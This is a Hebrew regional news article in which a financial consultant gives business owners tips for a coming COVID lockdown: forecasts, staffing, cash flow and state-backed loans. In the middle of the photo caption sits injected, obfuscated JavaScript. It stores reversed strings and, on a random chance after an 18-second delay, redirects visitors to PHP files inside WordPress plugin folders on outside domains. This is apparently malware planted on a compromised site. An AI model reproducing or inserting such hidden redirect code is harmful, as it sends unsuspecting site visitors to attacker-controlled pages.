fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

הפעם תגיעו מוכנים: כך תכינו את העסק לסגר הקרוב

אילנה הולמן, הבעלים והמנכ"לית של הולמנ'ס ניהול פיננסי יד ביד, חוותה עם לקוחותיה את הסגר הראשון, וסייעה להם לצאת ממנו עם מינימום נזקים. עכשיו היא חולקת עמנו את הניסיון שלה וממליצה לנצל את הזמן שנשאר עד לסגר הקרוב להכנת העסק באופן הנכון והבטוח ביותר פיננסית
Photo by Lukas from Pexels
Pho$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to by Lukas from Pexels

עם תחילת משבר הקורונה נחת על המשק, ללא הודעה מוקדמת, הסגר הראשון. הסגר הפתיע בעלי עסקים רבים שנותרו ללא כלים פיננסיים מתאימים להתמודדות עם המשבר.

כמלווה כלכלית של לא מעט עסקים וחברות שהופתעו מההשפעות המידיות של הסגר, לקחתי באופן מהיר את המושכות לידיי והובלתי את מנהלי החברות וסמנכ"לי הכספים לביצוע מהלכים מידיים באמצעות תוכנית עבודה מדויקת לתקופה הקשה.

היום, בהסתכלות אחורנית, הפעולות בהן נקטנו הוכיחו את עצמן וסייעו ללקוחותיי לעבור את תקופת הסגר ואת התקופה שהגיעה אחריה, בצורה מיטבית ובמינימום פגיעה.

השבוע, אנו עשויים להתבשר על סגר נוסף, לכן, רגע לפני שתופתעו, אני רוצה לחלוק אתכם מספר טיפים שיסייעו להתמודד עמו בצורה מיטבית, למזער את הנזקים ולסייע לעסקים להיכנס ולצאת מהסגר מחוזקים ובטוחים יותר:

  • הערכת היקף הפגיעה: נסו להעריך את עומק הפגיעה במכירות בתקופת הסגר ולאחריה.
  • תחזית מכירות: הכינו תחזית מכירות ריאלית, ותחזית נוספת, פסימית ככל שניתן, לתקופת הסגר ולתקופה שלאחריה.
  • מצבת עובדים: הכינו רשימה של מצבת העובדים הנוכחית והתאימו אותה לתחזית המכירות הצפויה בתקופת הסגר. מתוך רשימת העובדים יש לסמן את העובדים ההכרחיים לעבוד בעסק בתקופה זו. את יתר העובדים יש לחלק לשניים: עובדים שיצאו לחל"ת במימוש התחזית הריאלית, ועובדים להוצאה לחל"ת למצב של מימוש תחזית פסימית יותר. באם מצבכם התזרימי מאפשר, יש לשקול הוצאת עובדים לחופשה על חשבון ימי החופשה הצבורה שלהם, זאת על מנת לאפשר חזרתם לעבודה באופן מידי, במידת הצורך.
  • תזרים מזומנים: הכינו תחזית תזרים מזומנים מדויקת ברמה יומית לתקופה של חודשיים לפחות.
  • עדכון התקציב השנתי: חשוב מאוד לעדכן את התקציב השנתי ואת תוכניות העבודה לתקופה שלאחר הסגר ועד לסוף השנה, על מנת להתאים את ההוצאות לקצב המכירות הצפוי.
  • תשלום במועד: השתדלו שלא לתת שיקים דחויים לספקים, אלא לשלם להם במועד התשלום הנדרש בפועל.
  • הלוואות: עסקים שטרם ניצלו את האפשרות לקחת את ההלוואה בערבות המדינה, מומלץ מאוד לממש אותה. מדובר בהלוואה שתאפשר לכם ביטחון תזרימי בתקופה הקשה ותאפשר לכם לצאת מחוזקים בסיום המשבר. מדובר בהלוואה לעסקים קטנים ובינוניים בשיעור של עד 24% מהמחזור העסקי לשנת 2019. ההלוואה ניתנת לתקופה של עד חמש שנים עם גרייס לשנה. בתקופת הגרייס הריבית ממומנת ע"י המדינה, ככה שבתקופה הקשה לא תעמיקו את הבור התזרימי של העסק. ריבית ההלוואה עומדת על p+1.5% בלבד ורמת הביטחונות הנדרשת נמוכה ועומדת על חמישה אחוז מסכום ההלוואה. אם החלטתם להגיש בקשה להלוואה, חשוב מאוד לדייק בתוכנית המוגשת לבנק. מצד אחד יש להראות צורך אמיתי ומנגד כושר החזר. על כן, עבור ההגשה, מומלץ להיעזר ביועץ בעל ניסיון ורזומה. מניסיון שלי בהגשת בקשות להלוואת קורונה, זה עוזר מאוד ומעלה את הסיכוי למיקסום המימון.
  • בקרה:
    • בקרה על המכירות: יש לבצע בקרה יום יומית על המכירות ביחס ליעד בתקופת הסגר ולאחריה. אם רואים שתחזית המכירות לא מתממשת בהתאם, יש לנקוט מידית בצעדים להגדלת המכירות, בין אם במבצעים או ביצירת קשר יזום עם לקוחות. אם פעולות אלו לא מממשות את תחזית המכירות, יש לנקוט מידית בצעדי חיסכון נוספים.
    • בקרה על התזרים: יש לבצע בקרה תזרימית יומית ובקרה חודשית לדוחות רווח והפסד, בהשוואה לתוכנית המעודכנת.

אל תוותרו על מהלכים אלו. מניסיון, אלו המפתחות להצלחת כל עסק, ובפרט בתקופה קשה כזו של חוזר ודאות יום יומי.

מאחלת לכולם שנה טובה, בריאות ומי ייתן שנעבור כולנו בשלום את התקופה הזו ונצא מחוזקים יותר לקראת התקופה של סיום משבר הקורונה.

מאת: אילנה הולמן, בעלים ומנכ"לית הולמנ'ס ניהול פיננסי יד ביד.

לאתר – לחצו כאן!

 

אילנה הולמן, הבעלים והמנכ"לית של הולמנ'ס ניהול פיננסי יד ביד | צילום: פרטי
אילנה הולמן, הבעלים והמנכ"לית של הולמנ'ס ניהול פיננסי יד ביד | צילום: פרטי

 

 

אהבתם את הכתבה? כתבו לנו בתגובות

והישארו מעודכנים באתר בלינקר ובפייסבוק של צפון 1 גליל מערבי ובחדשות נהריה

כבר הורדתם את האפליקציה החדשה של חדשות נהריה?

לחצו על הלינק והורידו אותה עכשיו בחינם:🥳

לינק הורדה למערכת אנדרואיד – לחצו כאן!

לינק הורדה מחנות אפל – לחצו כאן!

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות